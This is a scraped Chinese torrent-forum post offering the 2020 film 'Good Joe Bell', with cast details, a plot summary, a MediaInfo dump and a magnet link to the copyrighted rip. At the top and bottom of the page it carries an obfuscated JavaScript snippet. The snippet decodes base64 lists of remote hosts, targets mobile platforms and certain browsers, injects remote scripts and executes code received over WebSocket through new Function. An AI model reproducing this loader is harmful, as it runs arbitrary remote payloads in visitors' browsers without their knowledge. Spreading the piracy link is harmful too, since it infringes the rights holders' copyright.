乔·贝尔[简繁字幕].Joe.Bell.2020.1080p.BluRay.x265.10bit.DD.5.1.MNHD 6.93GB

版主小s 1月前 224

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 乔·贝尔 / 好样的乔·贝尔

◎片 名 Good Joe Bell

◎年 代 2020

◎产 地 美国

◎类 别 剧情 / 同性

◎语 言 英语

◎上映日期 2020-09-14(多伦多电影节) / 2021-07-23(美国)

◎IMDb链接 https://www.imdb.com/title/tt4651466/

◎豆瓣评分 6.6/10 (263人评价)

◎豆瓣链接 https://movie.douban.com/subject/33406482/

◎片 长 90分钟

◎导 演 雷纳尔多·马库斯·格林 Reinaldo Marcus Green (id:1340427)

◎编 剧 黛安娜·奥撒纳 Diana Ossana (id:1293694)

拉里·麦克穆特瑞 Larry McMurtry (id:1018394)

◎演 员 马克·沃尔伯格 Mark Wahlberg (id:1035674)

里德·米勒 Reid Miller (id:1459991)

康妮·布里登 Connie Britton (id:1031898)

马克斯威尔·詹金斯 Maxwell Jenkins (id:1384569)

加里·西尼斯 Gary Sinise (id:1031848)

摩根·莉莉 Morgan Lily (id:1000182)

布莱恩·梅 Blaine Maye (id:1408276)

伊格比·里格尼 Igby Rigney (id:1459992)

科洛尔·钱伯斯 Coral Chambers (id:1406826)

丝科特·史密斯 Scout Smith (id:1459993)

大卫·H·史蒂文斯 David H. Stevens (id:1359230)

布莱克·巴洛 Blake Barlow (id:1459994)

查尔斯·哈尔福德 Charles Halford (id:1099054)

胡安·安东尼奥 Juan Antonio (id:1437490)

肯纳迪·克拉克 Kenadee Clark (id:1459995)

阿什·桑托斯 Ash Santos (id:1400974)

卡茜·贝克 Cassie Beck (id:1459996)

克里斯蒂娜·瑟蒙德 Christina Thurmond (id:1459997)

拉奎尔·霍顿 Raquel Horton (id:1459998)

布兰登·奥列佛 Brandon Olive (id:1023607)

杰克·布朗 Jake Brown (id:1394510)

布罗克·麦金尼 Brock McKinney (id:1394505)

奥斯丁·R·格兰特 Austin R. Grant (id:1386307)

查拉·博奇奥 Charla Bocchicchio (id:1458045)

戴夫·布雷斯纳安 Dave Bresnahan (id:1395422)

约翰·福克 John Forker (id:1394508)

黛安·D·比姆 Diane D. Beam (id:1390106)

雷切尔·哈代 Rachelle Hardy (id:1394506)

乔治娅·帕克特 Georgia Puckett (id:1394498)

Tara Buck Tara Buck (id:1069722)

Alexia Garcia Alexia Garcia (id:1423540)

Jason Kelly Jason Kelly (id:1180125)

Jaci Twiss (id:1230653)

杰克·吉伦哈尔 Jake Gyllenhaal (id:1048002)

马克·沃尔伯格 Mark Wahlberg (id:1035674)

凯瑞·福永 Cary Fukunaga (id:1009531)

雅克·乔夫雷特 Jacques Jouffret (id:1288027)

苏珊·马瑟森 Susan Matheson (id:1450159)

◎标 签 美国 / 2020 / 同性 / LGBT / 家庭 / 剧情 / 文艺 / 人生

◎简 介

影片根据真实事件改编,讲述雅丁(里德·米勒 饰)因性取向遭受同学的霸凌而自杀,他的父亲乔·贝尔(马克·沃尔伯格 饰)由此展开了一场穿越美国之旅,在这场旅行中,乔·贝尔随时都能感受到雅丁就在他的身边。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 220895862139765120405823554915284920504 (0xA62EFEDC4640111DD45B7172C3C9A8B8)

  4. Complete name : [email protected]OM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.93 GiB

  8. Duration : 1 h 33 min

  9. Overall bit rate : 10.6 Mb/s

  10. Movie name : [email protected]OM

  11. Encoded date : UTC 2021-10-30 23:34:30

  12. Writing application : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  13. Writing library : libebml v1.4.1 + libmatroska v1.6.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 33 min

  21. Bit rate : 9 933 kb/s

  22. Width : 1 920 pixels

  23. Height : 694 pixels

  24. Display aspect ratio : 2.767

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.311

  31. Stream size : 6.49 GiB (94%)

  32. Writing library : x265 3.5+1-f0c1022b6:[Linux][GCC 9.3.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=11 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x694 / interlace=0 / total-frames=134662 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=1 / keyint=250 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.50 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=-2 / crqpoffs=-2 / rc=crf / crf=16.3 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=1 / aq-strength=1.00 / no-cutree / zone-count=0 / no-strict-cbr / qg-size=8 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default : Yes

  35. Forced : No

  36. Color range : Limited

  37. Color primaries : BT.709

  38. Transfer characteristics : BT.709

  39. Matrix coefficients : BT.709


  40. Audio

  41. ID : 2

  42. Format : AC-3

  43. Format/Info : Audio Coding 3

  44. Commercial name : Dolby Digital

  45. Codec ID : A_AC3

  46. Duration : 1 h 33 min

  47. Bit rate mode : Constant

  48. Bit rate : 640 kb/s

  49. Channel(s) : 6 channels

  50. Channel layout : L R C LFE Ls Rs

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 31.250 FPS (1536 SPF)

  53. Compression mode : Lossy

  54. Stream size : 429 MiB (6%)

  55. Title : English

  56. Language : English

  57. Service kind : Complete Main

  58. Default : Yes

  59. Forced : No


  60. Text #1

  61. ID : 3

  62. Format : UTF-8

  63. Codec ID : S_TEXT/UTF8

  64. Codec ID/Info : UTF-8 Plain Text

  65. Duration : 1 h 28 min

  66. Bit rate : 117 b/s

  67. Count of elements : 1188

  68. Stream size : 76.5 KiB (0%)

  69. Title : Chinese (Simplified)&English

  70. Language : Chinese

  71. Default : Yes

  72. Forced : No


  73. Text #2

  74. ID : 4

  75. Format : UTF-8

  76. Codec ID : S_TEXT/UTF8

  77. Codec ID/Info : UTF-8 Plain Text

  78. Duration : 1 h 28 min

  79. Bit rate : 117 b/s

  80. Count of elements : 1188

  81. Stream size : 76.5 KiB (0%)

  82. Title : Chinese (Traditional)&English

  83. Language : Chinese

  84. Default : No

  85. Forced : No


  86. Text #3

  87. ID : 5

  88. Format : UTF-8

  89. Codec ID : S_TEXT/UTF8

  90. Codec ID/Info : UTF-8 Plain Text

  91. Duration : 1 h 28 min

  92. Bit rate : 51 b/s

  93. Count of elements : 1188

  94. Stream size : 33.8 KiB (0%)

  95. Title : Chinese (Simplified)

  96. Language : Chinese

  97. Default : No

  98. Forced : No


  99. Text #4

  100. ID : 6

  101. Format : UTF-8

  102. Codec ID : S_TEXT/UTF8

  103. Codec ID/Info : UTF-8 Plain Text

  104. Duration : 1 h 28 min

  105. Bit rate : 51 b/s

  106. Count of elements : 1188

  107. Stream size : 33.8 KiB (0%)

  108. Title : Chinese (Traditional)

  109. Language : Chinese

  110. Default : No

  111. Forced : No


  112. Text #5

  113. ID : 7

  114. Format : UTF-8

  115. Codec ID : S_TEXT/UTF8

  116. Codec ID/Info : UTF-8 Plain Text

  117. Duration : 1 h 28 min

  118. Bit rate : 62 b/s

  119. Count of elements : 1185

  120. Stream size : 40.4 KiB (0%)

  121. Title : English

  122. Language : English

  123. Default : No

  124. Forced : No


  125. Text #6

  126. ID : 8

  127. Format : PGS

  128. Muxing mode : zlib

  129. Codec ID : S_HDMV/PGS

  130. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  131. Duration : 1 h 29 min

  132. Bit rate : 36.3 kb/s

  133. Count of elements : 2808

  134. Stream size : 23.4 MiB (0%)

  135. Title : English

  136. Language : English

  137. Default : No

  138. Forced : No


  139. Menu

  140. 00:00:00.000 : en:Chapter 01

  141. 00:09:32.739 : en:Chapter 02

  142. 00:17:12.949 : en:Chapter 03

  143. 00:27:41.201 : en:Chapter 04

  144. 00:35:10.525 : en:Chapter 05

  145. 00:44:56.527 : en:Chapter 06

  146. 00:52:31.523 : en:Chapter 07

  147. 01:01:49.331 : en:Chapter 08

  148. 01:10:28.891 : en:Chapter 09

  149. 01:19:55.916 : en:Chapter 10

  150. 01:26:03.116 : en:Chapter 11




复制代码


TAGS 剧情 同性

磁力链:
  • magnet:?xt=urn:btih:13A7133E438F2546820AF9490E1F9208474E1907

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};